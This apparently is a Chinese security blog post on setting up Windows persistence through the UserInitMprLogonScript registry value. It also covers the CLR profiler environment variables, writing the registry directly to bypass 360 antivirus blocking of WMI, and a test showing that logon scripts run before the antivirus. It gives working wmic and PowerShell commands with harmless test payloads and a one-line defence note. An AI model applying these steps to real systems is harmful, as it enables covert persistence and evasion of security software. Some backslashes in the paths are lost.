Logon Scripts的后门实现思路

0x01 简介

· Logon Scripts用法

· 绕过360对wmi调用的拦截

· 特别用法

0x02 Logon Scripts用法

思路来自于Adam@Hexacorn，地址如下：

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

简要介绍Logon Scripts的用法

注册表路径：HKCREnvironment

创建字符串键值： UserInitMprLogonScript

键值设置为bat的绝对路径：c:test11.bat

如下图

bat内容如下：

start calc.exe

注销，登录

执行脚本11.bat，弹出计算器

0x03 绕过360对通过wmi修改环境变量的拦截

在之前的文章《Use CLR to maintain persistence》提到过使用wmic修改环境变量的方法

命令如下：

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"


wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

然而，360会对WMI的操作进行拦截，如下图

其实通过WMI添加环境变量等价于在注册表HKCREnvironment新建键值

所以对WMI的操作可以通过写注册表的操作进行代替

以上WMI命令可替换为如下powershell代码：

New-ItemProperty "HKCU:Environment" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null

New-ItemProperty "HKCU:Environment" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null

0x04 特别用法

源于我的一个特别的想法

我在对该技巧研究的过程中，产生了一个有趣的想法，Logon Scripts启动的顺序是否优先于其他程序呢？

如果是的话，那么是否也优先于杀毒软件呢？

下面开始我的测试：

1、cmd输入如下代码

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"

不出意外，被拦截

2、设置Logon Scripts

11.bat代码如下：

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"

reg query HKEY_CURRENT_USEREnvironment /V test

pause

3、启用Logon Scripts

注册表路径：HKCREnvironment

创建字符串键值： UserInitMprLogonScript

键值设置为bat的绝对路径：c:test11.bat

由于调用WMI会被拦截，可以通过powershell实现，代码如下：

New-ItemProperty "HKCU:Environment" UserInitMprLogonScript -value "c:test11.bat" -propertyType string | Out-Null

4、注销，重新登录，测试

如果注册表HKCREnvironment成功被写入键值test REG_SZ I run faster!，说明Logon Scripts优先于杀毒软件执行，绕过杀毒软件的限制

完整操作如下图

测试成功，验证我们的结论

0x05 防御

监控注册表键值HKCREnvironmentUserInitMprLogonScript

0x06 小结

本文对Logon Scripts的用法进行了测试，并且介绍了一个特别用法，Logon Scripts能够优先于杀毒软件执行，绕过杀毒软件对敏感操作的拦截。

站在防御的角度，要对此保持警惕。